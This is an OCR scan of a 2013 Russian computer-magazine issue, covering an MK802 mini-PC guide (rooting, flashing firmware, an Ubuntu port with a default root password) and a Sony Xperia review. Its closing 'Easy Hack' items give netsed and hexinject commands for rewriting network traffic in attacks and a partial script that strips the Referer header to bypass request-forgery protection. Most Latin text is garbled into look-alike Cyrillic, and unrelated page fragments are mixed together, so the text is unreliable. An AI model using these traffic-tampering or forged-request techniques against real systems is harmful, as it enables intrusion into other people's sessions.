в НОМ!-вход любого телека или монитора (ну или воспользо- 
ваться НОМ!-удлинителем), а в другую вставить пт У$В-шнур 
и запитать его любым удобным способом — хоть зарядником, 
хоть через комп. 

Штуковина включается автоматически сразу после подачи 
питания, и уже через 20 секунд на экране появляется рабочий 
стол Апаго. Для удобства управления некоторые производи- 
тели прикладывают к своим НОМ!-стикам специальные пульты 
(которые можно купить по 10 долларов за штуку натех же дилэк- 
стримах). Но гораздо удобнее использовать, хотя бы на первых 
порах, простую беспроводную мышь, она без проблем опреде- 
ляется и работает сразу после подключения. В будущем вместо 
нее можно использовать софтину ОгомАМое или официальную 
АКАетофеСотго!, которые позволяют рулить устройством 
со смартфона (и да, это все равно удобнее пульта). 

После обзаведения мышкой все остальное становится про- 
сто и очевидно: настройка языка, подключение к \М-Н, под- 
ключение Соод!е-аккаунта, установка софта. Внутри это самый 
обычный Апагог, так что никаких проблем с его использовани- 
ем возникнуть не должно. Если же ты хочешь выжать действи- 
тельно все из этого устройства и научиться использовать его 
эффективно, то без некоторых трюков и хаков не обойтись. 


УДАЛ ЕННЫЙ КОНТРОЛЬ 

Мышка — это хорошо и удобно, да и клавиатура — неплохо, 
но мы должны позаботиться о более универсальных мето- 
дах управления. Лучше всего на эту роль подойдет смартфон 
на том же андроиде, тем более что у любого устройства серии 
МК802, за исключением первых двух, есть собственная систе- 
ма удаленного управления с помощью смартфона под названи- 
ем АКАетоеСопто|. 

Система эта хороша тем, что, обладая функциональностью 
пультов, требующих права гос\, она уже имеет встроенный сер- 
вер и в самом рутинге не нуждается. Единственное, что придет- 
ся сделать, — это скачать приложение для управления со сто- 
роннего сайта (чоо.аИ/\М\МОгОТ) и самостоятельно установить 
на управляющее устройство (смартфон или планшет). 

Пульт включает в себя четыре основные функции: тачпад 
(удаленная мышь), удаленная клавиатура, управление медиа- 
плеером и навигация (кнопки вверх, вниз, влево, вправо, домой, 
назад, поиск и так далее). В общем и целом приложение очень 
неплохое, хотя и уступает ОгоаМоге, которое и работает лучше, 
и включает в себя джойстик. С другой стороны, за ОгоаМще 
придется заплатить, да еще и получить права гос{ перед этим. 
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Еще один интересный вариант — это использовать раз- 
личные Вущосо-мыши, клавиатуры и джойстики. Начиная 
с МК802 Ш устройство поддерживает синий зуб, так что все 
это будет работать без всяких проблем. Кстати, чтобы при ис- 
пользовании различных УЗВ или любых удаленных клавиатур 
на экране не появлялась стандартная клава Апагоа, можно 
установить МУ Кеубоага из маркета. Это такая заглушка, 
встающая на место нормальной клавы. Перед использовани- 
ем следует активировать через «Настройки -› Язык и ввод -> 
По умолчанию». 


ПРОВОДНОЙ ИНТЕРНЕТ 

В том случае, если по каким-то причинам у тебя нет \ММ-Р! (что 
очень странно в 2013 году), устройство вполне себе можно 
вывести в интернет, используя переходник ЧЗВ — НВ/45. При- 
обрести такой можно опять же в любом китайском интернет- 
магазине за 3—4 доллара (например, тут: чоо.а/И9срР), ну или 
в компьютерном магазине, переплатив в три раза. 

В любом случае переходник достаточно воткнуть в УЗВ- 
порт, включить в настройках опцию Епете, и, если на другом 
конце есть ОНСР-сервер, уже через несколько секунд система 
будет в интернете. Если же используется статическая настрой- 
ка, то в той же опции Етегте для этого есть пункт «Зтайс ПР 
Зе{тоа$», где можно самостоятельно прописать Р, адрес шлюза 
и ОМ№$-сервера. 


ИСНОВАВООТ 

Хотя МК802 можно использовать без гоо{ и установки сторонних 
прошивок, последние открывают гораздо больше интересных 
возможностей. Так, имея гооф, можно отключить показ нижней 
строки управления, которая на телевизоре практически лишена 
смысла, активировать режим отладки (АБВ) по \\\-Н, позволя- 
ющий без лишних усилий перекидывать на устройство файлы, 
делать резервные копии приложений, синхронизировать дан- 
ные приложений (что очень удобно использовать для обмена 
сохранениями в играх), а также много чего другого. 

Как и в случае с любым другим Апагоа-девайсом, есть три 
пути получить гоо{ на МК802: это воспользоваться эксплойтом, 
прошить обновление с рутом либо установить уже рутован- 
ную кастомную прошивку. В следующем разделе я расскажу 
об установке прошивки Ет!е$$ ВОМ, а сейчас объясню, как об- 
завестись рутом на МК802 11. 

Самый простой и незамысловатый способ сделать это — 
установить специальным образом подготовленное обновле- 
ние, которое добавит в систему команду /зузЗет/бт/зи и при- 
ложение Зирепег, обеспечивающие доступ к полномочиям 
суперпользователя. Для этого достаточно выполнить три про- 
стых шага: 

1. Скачать файл ираз{е.тр (чоо.а/обьроЕ) и положить его в ко- 
рень любой имеющейся карты памяти. 

2. Воткнуть карту памяти в устройство, после чего на экране 
должно появиться сообщение об обновлении, за которым 
последует перезагрузка и установка прошивки. 


Мини-ПК в разобран- 
ном виде 
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3. После окончания процесса установки карту следует вынуть 
и удалить с нее файл, иначе после ее повторного втыкания 
девайс опять попробует обновиться. 


После перезагрузки прошивка будет рутована, и ты смо- 
жешь воспользоваться приложением Ти!!5сгееп для сокрытия 
строки состояния, МИ! АОВ для доступа к АОШВ через беспро- 
водную сеть, РРР \М/ЛадЕ для простого подключения к инету 
через ЗС-модем, а также получишь возможность использовать 
девайс как сервер (об этом позже). 


ПРОШИВКИ 

Система на кристалле ВКЗ0Обб и ее более поздние моди- 

фикации, на которых базируется МК802 начиная с версии 

!, отличается тем, что производитель не открывает $0К 

на свое железо. Из-за этого процесс портирования других 

ОС существенно затрудняется, и сборок, например, того же 

СуаподепМоч для устройств на базе ВКЗОб6 найти невозмож- 

но. Остается довольствоваться модификациями стандартной 

прошивки от производителя. Наиболее интересной из них 

я бы назвал прошивку Ете$$ РВОМ, подходящую для МК802 Ш 

и аналогов. От стоковой она отличается следующими возмож- 

ностями: 

. Автосокрытие строки состояния при запуске любого прило- 
жения. Очень удобная функция, доступна через меню: «На- 
стройки -—› Экран > Ащо Нае учет Ваг». 

. Возможность включения экрана блокировки. Функция по- 
лезна тем, что позволяет задать пин-код, чтобы никто, кро- 
ме тебя, не смог воспользоваться Эта ТМ. 

. Автоматический уход в сон с гашением экрана. Срабатывает 
через определенный промежуток времени после прекраще- 
ния любой сетевой активности. Включается в «Настройки -> 
Экран > Спящий режим». 

. Поддержка определения местоположения по !Р-адресу. По- 
зволяет, например, получать более точные результаты по- 
иска или корректно работать приложениям, отображающим 
погоду и другие геозависимые данные. 

. Фикс проблемы совместимости с играми от Сатей, от ко- 
торой страдают почти все девайсы на РКЗО66. 

. Поддержка аппаратного декодирования видео в ХВМС. 

Совместимость с джойстиком от Хрох. 


Однако самое главное — это полноценная поддержка вывода 
видео в разрешении 1080р. Дело в том, что, хотя МК8О2 и под- 
держивает вывод в этом разрешении, Апаго!а так или иначе 
оперирует картинкой 720р, а при отправке на экран масшта- 
бирует ее до 1080р. В результате при близком рассмотрении 
на Ри! НО экранах изображение выглядит нечетким, а текст 
на белом фоне становится трудно читать. 

Производитель сделал это намеренно, потому что с рабо- 
той в режиме 1080р устройство справляется с большим тру- 
дом, из-за чего Апаго начинает притормаживать, игры лагать, 
а видео в 1080р так нагружает устройство, что оно может про- 
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Маленький силач 


Процесс прошивки МК802 Ш с помощью 
утилиты Восксшр ВаЕсИ То] напоминает 


какой-то нелогичный квест из плохой иеры 


сто сгореть. Если тебя это не напрягает, в комплект Ете5$ ВОМ 
включено Ри! НО ядро, которое можно выбрать при загрузке. 


Как и все остальные девайсы на АКЗ066, МК802 Ш прошива- 


ется с помощью фирменной утилиты Восксйр Ва{сп Тоо1, а сам 
процесс прошивки напоминает какой-то нелогичный квест 
из плохой игры. В общем и целом делается это так: 


1. 


10. 


Подопытный девайс обесточиваем, а кабель питания втыка- 
ем в боковой ОТ@-разъем вместо заднего. Обратный конец 
кабеля втыкаем в комп. 

На компе загружаем \ЛЛпаом/$ и скачиваем архив с прошив- 
кой и всеми необходимыми инструментами (чоо.а/ОТ5ИЮ). 
Архив распаковываем, куда угодно, и запускаем содержа- 
щийся в нем файл НОМ ЕЁа$й Тод!.ехе, который выводит 
на экран окно, где должна появиться надпись «Мо Гоипа 
ВКАпагога госк ЧЗВ». 

В настройках девайса активируем режим доступа к нако- 
пителю с помощью «Настройки -> Память —› Меню -»› Ма$$ 
Зогаде». 

После этого в РВОМ НазПп Тод! должна появиться надпись 
«Гоипа АКАпаго Ма$$ Зогаде УЗВ». Если это так, нажима- 
ем на кнопку «Верос То Назй Моде». 

Девайс перезагружается и после этого появляется в диспет- 
чере устройств \ММпо\м5$ как неизвестное устройство. Чтобы 
исправить это, следует перейти в диспетчер устройств, 
найти устройство с именем типа ВКЗО, помеченное желтым 
восклицательным знаком, открыть его и нажать кнопку «Об- 
новить драйвер». Далее следует указать для поиска драйве- 
ра папку с распакованным Еие$$ ВОМ, в ней х3З2 или хб4, 
в зависимости от разрядности ОС, и уже там нужную ОС (ХР, 
\М$а...). Винда установит драйвер и предложит перезагру- 
зиться. Соглашаемся. 

После перезагрузки вновь запускаем ВОМ ЕЁа$Пп Тоо.ехе, 
ждем появления надписи «Гоипа АКАпагоа Ма$$ Зогаде 
($В». Опять жмем «Верос: {о Назй Моде», ждем появления 
той же надписи, после чего жмем «Егазе МАМО (10В)}», чтобы 
стереть все, что есть на устройстве. 

(Опциональный шаг) Если требуется Ри! НО ядро, находим 
в верхнем списке прошиваемых компонентов Кете!720.1тд 
и переименовываем в Кете!1080.1тод. 

Жмем «Назй ВОМ» и ждем окончания прошивки. 

Ждем полной загрузки системы. 


Если система не загружается, повторяем последние четыре 


шага. 


СЕРВЕР 

Замечательная черта МК802 — подключать НОМ! для работы 
необязательно. Эта особенность, в сочетании с крошечными 
размерами самого устройства, превращает МК802 в заман- 


ККАпаго госК 9$В по! деес{е4 


О а 


Г | 0х00000000 | рагапленег 
Г | 000002000 | пис 
= 


У\/АВММС 


При активации спящего 
режимав Ет!ез$ ВОМ 
не забудь включить 
внастройках \\-Н 
постоянное подклю- 
чение ксети, иначе 
сразу после засыпания 
устройства ты потеря- 
ешь сним связь. 


При установке Р!сити 
необходимо прошить 
ядро враздел гесоуегу 


т 


МОЗТ НАУЕ 


СОФТИН ДЛЯ МИНИ-ПИ 


УР!ауег — один из лучших видеоплееров 
для Апагоа. Играет все и задействует аппарат- 
ное ускорение. 

Типеш Ваю — лучшее приложение для про- 
слушивания оп!те-радио. Семь тысяч станций 
и огромное количество подкастов на любой вкус 
и цвет. Отлично вписывается в телевизор. 

50Орх — один из самых известных файловых об- 
менников для профессиональных и претендую- 
щих на это звание фотографов. Огромный склад 
потрясающих высококачественных фотографий. 
В случае с ТВ-приставкой приложение интерес- 
но в первую очередь возможностью включить 
слайд-шоу. 

ХВМС — не нуждающийся в представлении ме- 
диацентр для Ипих и Апагою. Превращает мини- 
ПК в полноценную мультимедийную станцию 
для прослушивания музыки, просмотра теле- 
передач и фильмов. Интересен огромным коли- 
чеством поддерживаемых источников мультиме- 
диаконтента. 

О!.ЕМ — известное в кругах любителей элек- 
тронной музыки интернет-радио с десятками 
жанровых каналов и эксклюзивными шоу от Мар- 
куса Шульца и других именитых личностей. К со- 
жалению, за качественный звук придется платить 
3 доллара в месяц. 

м.ги — один из наиболее известных легальных 
интернет-кинотеатров в России с «оплатой» про- 
смотром рекламы. Имеет подозрительно каче- 
ственное клиентское приложение, которое про- 
сто идеально вписывается в экран телевизора. 
С другой стороны, выбор фильмов не такой уж 
болышой. 

УКР!ауег — плеер медиаконтента из социальной 
сети «ВКонтакте». Вписывается в экран телеви- 
зора гораздо лучше официального клиента. 
ОгоАМо{фе — лучший пульт управления андро- 
идом с помощью андроида. Минуса два: гост 
и цена 2 доллара за сервер. 

Ерзе — лучший эмулятор Р!ауЗайоп. 

Оо$Вох Тигфо — лучшая, но платная версия эму- 
лятора РОЗВох для Апагоа. Ностальгирующие 
могут поиграть, например, в Х-СОМ и Мафег от 
Опоп 2. 
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$егуег; Леитате полностью интегрируется 
в Апаго и позволяет запускать серверы 
при загрузке или возникновении событий 


чивого кандидата на роль домашнего энергоэффективного 
и очень неплохого по характеристикам сервера. Остается ре- 
шить одну проблему — Апагоа непригоден для выполнения по- 
добных задач. 

Самый простой способ сделать это — установить приложе- 
ние Зегуегз Уйтае из маркета. Это ни много ни мало сборник 
из около 40 различных серверов и 14 сетевых утилит для мони- 
торинга и управления. Приложение позволяет запускать такие 
серверы, как ОНСР, ОМ$, С\$, ЕТР, МуЗОЕ, НТТР, РНР ХЛ1, $МВ 
и даже ух. Причем это не просто сборник серверов в красивой 
графической оболочке, которые можно только запустить и оста- 
новить со стандартными настройками. Для каждого сервера 
реализован графический интерфейс настройки, позволяющий 
изменить множество опций. Оптимизированный пашх с Вибу 
оп Вай$ таким образом, конечно, не настроишь, а вот запустить 
свой собственный ЕТР- и ЗМВ-сервер для расшаривания фай- 
лов с подключенного по УЗВ жесткого диска очень даже можно. 
Зегуег УИитае полностью интегрируется в Апаго и позволяет 
запускать серверы при загрузке либо возникновении событий, 
просматривать состояние серверов и логи с помощью удобного 
интерфейса и многое другое. В общем, просто мечта, вот толь- 
ко стоит это все — даже с учетом сезонного снижения цены — 
10 долларов. Бесплатная версия позволяет запускать только 
два сервера одновременно, да ито втечение 14 дней (Тпа|). 

Впрочем, в маркете можно найти и множество других, в ос- 
новном менее качественных оберток для запуска серверов. 
Тот же аго4$$Па для ЭЗН, например. При наличии гоо1 также 
можно воспользоваться инструментами для установки ШИпих- 
дистрибутива, такими как Ипих Оероу, и устанавливать необхо- 
димые серверы уже в него. Еще более интересный вариант — 
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это инструмент Во{Вгеми (Бо{ТЮгем/.сот), который позволяет 
устанавливать Мпих-софт, в том числе Араспе и Затра, прямо 
в Апаго. Кстати, в следующем выпуске журнала о нем будет 
отдельная статья, не пропусти. 

Ну и самый верный вариант — это установить на устройство 
настоящий дистрибутив Ипих. 


ОВОМТО 
Несмотря на отсутствие сколько-нибудь нормально работа- 
ющих прошивок на базе СуаподепМоа, для МК802 Ш и клонов 
вполне себе существует качественный и полностью работоспо- 
собный порт Убищи 12.10, да еще и устанавливаемый как аль- 
тернативная ОС рядом с основной (соде.аоое.сот/р/гКЗО66- 
ппих). Фактически это означает, что МК802 может быть очень 
неплохим тонким клиентом, сервером или простым ПК для це- 
лей типа «зайти проверить почту» или «посмотреть котиков в ин- 
тернете». Для цены в 60 долларов это очень и очень неплохо. 

Сама установка включает в себя два шага: первый — про- 
шивка альтернативного ядра в гесоуегу-раздел устройства 
и второй — установка самой системы на флешку или $0 -карту 
(понадобится карточка размером не меньше 4 Гб). Для прошив- 
ки ядра мы воспользуемся уже знакомым по установке прошив- 
ки Ете$$ ВОМ инструментом РВОМ ЕЁа$й Тоо|.ехе. Скачиваем 
ядро (а0о.9/ихХОВ5), запускаем РОМ ЕЁа$й Тоо1.ехе, но в этот 
раз в верхней части окна снимаем галочки со всех полей, кроме 
шестого (гесоуегу), нажимаем на последнее поле и выбираем 
ранее скачанный файл. Нажимаем «Нап РВОМ». Это все. 

Чтобы установить сам дистрибутив Убип\и на карту памяти, 
загружаемся в Ипих на настольной машине (без него никак), 
скачиваем скрипт рге-рситщи.$П (чоо.9/В$В!$), запускаем: 


Базй рге-р1сипфи. $8 


и следуем инструкциям. Как вариант, установку можно выпол- 
нить самостоятельно. Для этого нужно создать на карте памяти 
ех{4-раздел с именем Ппихгос\, а затем распаковать в него ар- 
хив с системой (ч00.9/у0Каб). Далее вставляем карту памяти 
в устройство и перезагружаем в режим гесоуегу одним из двух 
способов на выбор: 

1. Спомощью приложения Верос в Етез$$ РОМ. 

2. Выполнив команду «5и && героо{ гесоуегу» в терминале 

Апагоа (нужен гоо`). 


После этого система перезагрузится в Убит. Если все ОК, 
появится окно логина, пароль для гоо{ — 12амаз2х. Чтобы вер- 
нуться обратно в Апагоа, просто перезагружаем устройство 
любым способом (хоть выдернув кабель питания). 


ВЫВОДЫ 

МК802 — прекрасное устройство, которое с лихвой отбивает 
свою цену. При должном уровне знаний и терпении его можно 
заставить делать абсолютно все, начиная от проигрывания ин- 
тернет-радио и заканчивая хостингом файлов. Его можно пре- 
вратить в тонкий клиент или купить Ви@юос{-джойстик и играть 
в игры. Несмотря на свое китайское происхождение и смешную 
цену, оно практически не имеет конструктивных проблем и мо- 
жет работать неделями напролет. = 
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НАЧАТЬ 
С КОНЦА 


ОБЗОР ОМУ ХРЕМА 2 


Формула модельного ряда 
Зопу прошлого года сводилась 
к тому, чтобы играть на других 
брендах компании: Р!ауТайоп, 
Вгама, \\Ма!Ктап и прочих. Увы, 
даже у флагманского Хрепа 

5 на момент выхода было до- 
статочно невзрачное железо 

и устаревшая версия Апагога. 
Кажется, что с Хрепа 2 компания 
прислушалась: здесь и мощное 
железо, и несколько собствен- 
ных фишек. Хватит ли их? 


ВКАЖДОЙДЫРКЕ ЗАТЫЧКА 

Дизайн модели проще всего охарактеризовать 
одним словом — симметрия. На выбор пред- 
лагается сэндвич из стекла и пластика белого, 
черного или фиолетового цвета. Единственный 
выступающий элемент — кнопка включения и ка- 
челька громкости. Ключевой момент — водоне- 
проницаемость. Чтобы защитить смартфон, Зопу 
пришлось прикрыть шторками все отверстия. Это 
выглядит удачно с учетом общего минимализма, 
но пострадала эргономика. Например, чтобы под- 
ключить наушники или УЗВ, придется нащупы- 
вать и открывать дверцу. Сами шторки, впрочем, 
кажутся надежными. 

Для флагманского устройства компания вы- 
брала аж пятидюймовый экран с разрешением 
Ри! НО — это аналогично топовым моделям кон- 
курентов, НТС ВивегЙу и Затзипа Саху $34. Та- 
ковы тенденции — выпустить флагман с экраном 
меньше 4,5 дюйма сейчас не решается ни одна 
компания. «Лопатообразность» компенсирует- 
ся тонкостью (7,9 мм), но одной рукой с Хрепа 2 
работать все равно неудобно. Опять-таки разре- 
шение в 1080р дает экрану плотность примерно 
440 точек, что почти на треть выше, чем у Вета- 
экрана у !РПопе. Считать это полезной особен- 
ностью сложно, тем более что других достоинств 
у экрана нет — подкачали яркость и углы обзора. 

Отдельно стоит отметить звук. С одной сто- 
роны, в комплекте с Хрепа 2 идут прекрасные 
наушники — особенно если сравнивать с тем, 
что обычно идет в комплекте с техникой Арре. 


У 


Александр Расмус 


С другой — звук из динамиков очень грязный, 
и посторонние шумы заметны даже на мелоди- 
ях звонка и оповещениях. Досадно — все-таки 
на таком экране вполне логично смотреть если 
и не кино, то хотя бы УочТиВе. 

Наконец, в смартфоне установлены две ка- 
меры. Разрешение матрицы фронтальной каме- 
ры составляет 2,2 Мп, поддерживается Ри! НО. 
В тыльной камере установлен сенсор на 13,1 Мп. 


ДОРВАЛИСЬ 

Начинка у Хрепа 2, в отличие от прошлогоднего 
флагмана, вполне актуальная: четырехъядерный 
процессор Оцасотт Зпарагадоп, работающий 
на частоте 1,5 ГГц, 2 Гб оперативной памяти, 16 Гб 
встроенной памяти. Хранилище расширяется 
как за счет карт птсго3О, так и за счет подклю- 
чения внешних накопителей через переходник 
Ц$В — ОТО. Сильной стороной смартфона явля- 
ется поддержка [ТЕ — хотя сейчас это скорее за- 
дел на будущее, ведь сети четвертого поколения 
еще не очень развиты в России. 

Впрочем, на фоне остальных флагманов это- 
го года Хрепа 2 не выделяется. Такой же чипсет 
используется в НТС ВиКег\у и 1@ Орити$ С, чуть 
более мощный (1,7 ГГц) —вНТС Опе. Выбивается 
разве что Затзипа Са!аху $4 с восьмиядерным 
процессором. Большинство аппаратов оснащены 
Ри! НО экранами (кроме ОрИити$ @ с разреше- 
нием в 720р), диагональ в большинстве случаев 
тоже составляет пять дюймов (кроме Орйти$ 
С и Опе). Таким образом, Хрепа 2 не лидиру- 
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ет по характеристикам — флагманы в этом году 
на редкость однообразные. Значит, выделяться 
нужно функциями. Получается ли это? 


1Т'$ЗАЗОМУ 
Японцы не стали ковыряться в Апаго так силь- 
но, как это делают, например, Затзипа или 
НТС. Изменения в основном коснулись интер- 
фейса — $опу попыталась привнести элементы 
из РауЗаНоп и других своих продуктов. Получи- 
лось не очень гармонично. Плоский и абстракт- 
ный дизайн Но плохо сочетается с объемными 
иконками и панелями, использованными Фопу. 
В фирменном медиаплеере М/аКтап вообще ре- 
шили использовать фотографии для обозначения 
секций, что резко выбивается из общей стилисти- 
ки Апагога. В этом смысле японским дизайнерам 
стоило бы посмотреть на НТС Зеп$е, в котором 
визуальных изменений тоже много, но они все- 
таки сочетаются с Ною. Кроме того, Ш от Зопу 
не лишен собственных багов — например, край- 
не раздражает автокоррекция, срабатывающая 
при заполнении служебных полей в приложениях 
вроде логина или адреса электронной почты. 
Функций разработчикам удалось добавить 
не так уж и много. Самая заметная и полезная — 
Затта Моде. По умолчанию смартфон работает 
от батареи не больше суток при активном ис- 
пользовании — что ожидаемо при таком экране. 
Затта Моае переводит смартфон на «спартан- 
ский» режим, отрубая мобильный интернет, М/-Р, 
Вцвос{И и фоновую работу приложений. По заяв- 
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Дизайн собственных приложений $опу резко вы- 
деляется на фоне Но 


лениям разработчиков, такая функция увеличива- 
ет время работы смартфона в четыре раза, и это 
похоже на правду. Впрочем, понятно, что никто 
не будет четыре дня использовать телефон за 30 
тысяч в режиме бабушкофона, но в экстренных 
ситуациях такая функция придет на помощь. Кро- 
ме того, у ЗЗатта Моае отличные настройки — 
можно определить, что именно нужно отключить, 
а также составить белый список приложений, ко- 
торые продолжат свою работу несмотря ни начто. 

Другая интересная функция — Эта Соппес{. 
В этом приложении можно создавать сценарии, 
автоматически выполняющиеся при подклю- 
чении внешнего устройства. Например, можно 
придумать сценарий, при котором при подклю- 
чении наушников сразу же будет включаться ау- 
диоплеер. Можно запустить любое приложение, 
отправить сообщение, сделать чекин в Гасебоок 
и так далее. А вот список условий довольно огра- 
ничен — действия осуществляются при обнару- 
жении устройства по Виос{й или \\/-Е! (очевид- 
но, в первую очередь это колонки), подключении 
наушников или зарядника, а также по таймеру. 
В таком приложении было бы логично добавить 
триггер по местонахождению или хотя бы по под- 
ключению к конкретной \ММ-Е!-сети. Функция дей- 
ствительно интересная, но возможностей у нее 
сейчас мало. Впрочем, в Сооде Р!ау достаточно 
других автоматизаторов, например Тазкег ( 

}: 

Заманчиво звучит описание функции Хрепа 
Цпк: между смартфоном и планшетом можно 
создать подключение, которое будет исполь- 
зоваться для тетеринга, а также оповещений 
о звонках и сообщениях на экране планшета. 
Увы, работает это только с планшетами Зопу, 
поэтому протестировать не удалось. Тетеринг 
в данном случае имеет смысл. Да, у владельца 
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смартфона за 30 тысяч, скорее всего, и план- 
шет подключен к мобильному интернету, но вот 
поддержки ТЕ там, скорее всего, нет. Да и идея 
с оповещениями на планшете тоже довольно 
удачна. Жаль только, что приложение доступно 
лишь на устройствах $Зопу. 

Наконец, в Хрепа 2 реализована популярная 
сейчас идея мини-приложений. Производители 
Апагоа-смартфонов вообще в последнее время 
любят экспериментировать с маленькими ап- 
пами, и мне кажется, что это довольно странная 
затея, — слишком уж мало понятных сценариев, 
в которых не было бы проще и удобнее просто 
переключиться на полнофункциональное прило- 
жение. 

На этом идеи инженеров $опу, увы, закончи- 
лись. Есть несколько фирменных приложений, 
вроде \№МаКтап (довольно базовый аудиопле- 
ер с эквалайзером) и ТгаскЮО (аналог ЗПагат 
и ЗоипаНоипа), непонятного социального агре- 
гатора ЗосаШе, предустановленного антивируса 
от МсАЕе и офисного пакета. В общем, все полу- 
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По умолчанию режим энергосбережения убивает 
любую фоновую активность приложений, но можно 
составить список исключений 


чилось не так аккуратно, как у НТС, и не так функ- 
ционально, как у Затзипод. 


ОСТАЕМСЯ НАТРЕТИЙ ГОД 
С флагманами этого года получилась интересная 
ситуация. По многим параметрам производители 
уже прошли все границы разумного: экраны с ма- 
трицей 1080р (хотя уровень Вейпа был достигнут 
с 720р уже давно), четырехъ- и восьмиядерные 
процессоры (что вообще смех), пятидюймовые 
экраны. Ни одна из этих вещей на самом деле 
не производит впечатления. 

Зопу в данном случае постаралась оказаться 
«В теме» и сделала телефон с такими же харак- 
теристиками. В итоге получился очень крупный 
аппарат со спорным экраном и звуком и неболь- 
шим количеством программных фишек. В плюс 
можно записать действительно крутой дизайн 
железа и защиту от воды (впрочем, сомневаюсь, 
что для кого-то это стало бы решающим факто- 
ром). Это лучший аппарат, выпущенный Фопу, 
но его опять оказалось недостаточно. и 


ПОДМЕНИТЬ ТРАФИК НА ЛЕТУ 


РЕШЕНИЕ 
Очень распространенная задачка, которая возникает при анализе работы 
какого-то протокола или при проведении атак, — это подменить в переда- 
ваемом трафике данные. Есть, например, клиентская программка, которая 
коннектится к серверу, и у них происходит обмен данными. Ну а нам надо 
что-то в них поменять. Решений, конечно, масса. Например, ЕЦегсар и его 
фильтры (о которых я писал года три назад) или классический ТСР-прокси. 

Хотя самым быстрым решением будет тулза пщеа (автор которой Ми- 
хал Залевский). Плюс ее (кроме того, что она входит в поставку с ВасКТгаск) 
в том, что она проста. По сути, это мини-портфорвардер с функцией под- 
становки строк. 

Все, что требуется, — указать в консоли: протокол, локальный порт, |1Р 
удаленного хоста, удаленный порт, а далее — набор правил (одно или не- 
сколько).Например: 


пеф5еа {ср 8080 192.168.0.1 80 '5/м1сЕ1т/Паскеа/2' 


Здесь мы указываем, чтобы программка слушала 8080-й порт и пере- 
правляла данные на сервер на 80-й порт, заменяя в первых двух пакетах 
строку мсит на паскеа. 


»еп{е${1/$п1{1Тег$ /Лех1п]ес{# Пех1п)ест - 
. ПИ 


Агг1уа| Т1те: Ацд 25, 2010 21:06:37. 398179000 
[Т1пе де\фа Тгот ргеу1ои$ сарфигед Тгате: 3.170919000 $е 
[Т1ме де\Фа Тгом ргеузои$ 9415р\ауед Тгате: 3,170919000 ы 


| 
| 


Алексей «Сгееп)од» Тюрин, 
ОгоНа! $есигИу 
адит4о9@дтай.сот, 

{м ег. сот/аптуип 
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Все описанные програм- 
мы со всей рубрики ищи 
на диске 


Как уже говорилось, правил может быть много, применяются они после- 
довательно и, что самое приятное, можно менять и бинарщину. Для этого 
надо указать подменяемые данные в урленкоженном виде (%+НЕХ). Напри- 
мер: 


пеф5е {ср 8080 192.168.0.1 80 '$/%00/%Р' '5/%01%02%03/ «= 
%00%00%00' 


Очень удобно и прикольно получается. Единственная приличная пробле- 
ма втом, что если подменяемая строка меньше/больше исходной, то может 
разойтись размерность пакетов и они будут некорректно обработаны (но 
это зависит от протокола). 

Еще одним решением, чем-то похожим, будет тулза Нехтес{ (чо0о.9/ 
Е5\ОМ). Но по использованию она заметно отличается. В ней разделены 
функции сниффера и функции инжектора. То есть для того, чтобы выпол- 
нить первую задачу замены строки, надо будет сделать примерно следу- 
ющее: 


Кех1п]есе -5 -1 ефи@ -с 2 | гер1асе ' 76 69 63 74 69 64' ‹: 
'68 61 63 66 65 72' | Нех1п]есЕ -р -1 ефи@ 


Здесь первый Пехтес{ соснифает пер- 
вые два пакета трафика на интерфейсе 
еп0 и далее передаст данные стандартной 
команде гер!асе. Она заменит строку и за- 
пустит Пехтесф, но уже на инжект данных. 
Вообще, в данном случае возможностей 
у нас существенно больше, так как есть все 
возможности внешних команд и тулз, а они 
в пх’ах очень широки. Вероятно, поэтому 
она попала в новую версию ВаскКТгаск — 
в Кай Ипих. 

Кроме того, приличный плюс еще есть 
в том, что мы можем, используя параметр -+, 
указывать классические рсар-фильтры для 
7\ перехватываемых данных. Например, «По${ 
192.168.0.100 апа ром 80» позволит нам ви- 
деть только НТТР-трафик с определенным 
ХОСТОМ. 
ее Кроме того, Нехщес имеет возможность 
работать с чистым \\/-Р!-трафиком, а также 
с УЗВ. Подход к ним аналогичен. И мне ка- 
жется, что это шикарно :). 


дгер Но$т 


Вынимаем изтрафика 
всезаголовки Но$+ 


Итогпоследовательно- 
сти "еспо'01 020304' | 
Вехщтуес+{ -р -геп0" 


Еазу Наск 
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УДАЛИТЬ ЗАГОЛОВОК ВЕГЕВЕВ 


53 


РЕШЕНИЕ 
В прошлый раз мы обсудили один из видов уауа$ спирт 
Нбаскто’а (с са!баск’ами), и там был пример с тай.ги. Как 
было отмечено, защита у них внедрена с помощью проверки 
заголовка Ветегег. В данном заголовке твой браузер указы- 
вает, с какого сайта ты перешел на другой сайт. Май.ги, видя, 
что запрос на получение данных инициирован с чужого для 
них поддомена, ничего дельного не отдает. Как было сказа- 
но, использование данного метода не очень хорошая прак- 
тика. Один из методов обхода мы как раз и обсудим сейчас. 
Метод обхода проверки Ветегег заключается в том, чтобы 
совсем убрать данный заголовок из запроса. Казалось бы, для 
разработчика все просто: нет заголовка — отвергай запрос. Но 


не тут-то было. Кроме того что, например, есть аддоны к бра- Бепеть  Дезоштсеь | Невой | Зоисеь  Тиеие  Рмее АМ 
Мат 2 
узерам, которые чистят данное поле (Ветегег, как ни странно, рав Неадег< | гемем Везропзе || “' “/ 9%? 


приличная утечка приватной информации для пользователей), < 105 гебеттеглит 


есть еще и закладки, и прямые ссылки, переходя по которым 
браузер пользователя не добавляет данный заголовок, так 
как предыдущего места и не было. Все это приводит к тому, =] 
что разработчики систематически разрешают, а точнее, об- 
рабатывают запросы с отсутствующим заголовком Ветегег так, 
будто он верный. Хотя пример из прошлого номера про тай. 
ги не таков (у них — без гетегег == некорректный ге{егег), стоит 
отметить, что они были уличены в такой баге, но в несколько 
другом сервисе. 

К чему это я? А ктому, что это — распространенная уяз- 
вимость. ОК. Важность понятна, задача тоже ясна — заста- 
вить сделать браузер жертвы запрос на какой-то ресурс, 


юЮ90_$т1.9й 


= С [Г 127.0.01:8081/е5+ ге{еггег.В т 


Соозе 


404. Тпаг$ ап еггог 


<> юдт.рир?юди_аНетр!=’ 


мимими .дооде.соттадез/егг 


[| меми-50игсе:127.0.0.1:8081 х 


С ГП мем-ошсе:127.0.0.1:8081/4е$Е гефетег.Иит 5х 
Е 1| <в5щ1> 
2| <пеаа> 
Е” 3| <зсхарс> 
4| ЕГопсс1оп 1оаа() { 
5 уаг розсаата = '<Еога 1а=аупЕога шесвоа=РОЗТ 


ассзоп=\ 'В5трз://муи.90091е.сощ/1091п.рНр?1091п ассешре=1\'> 
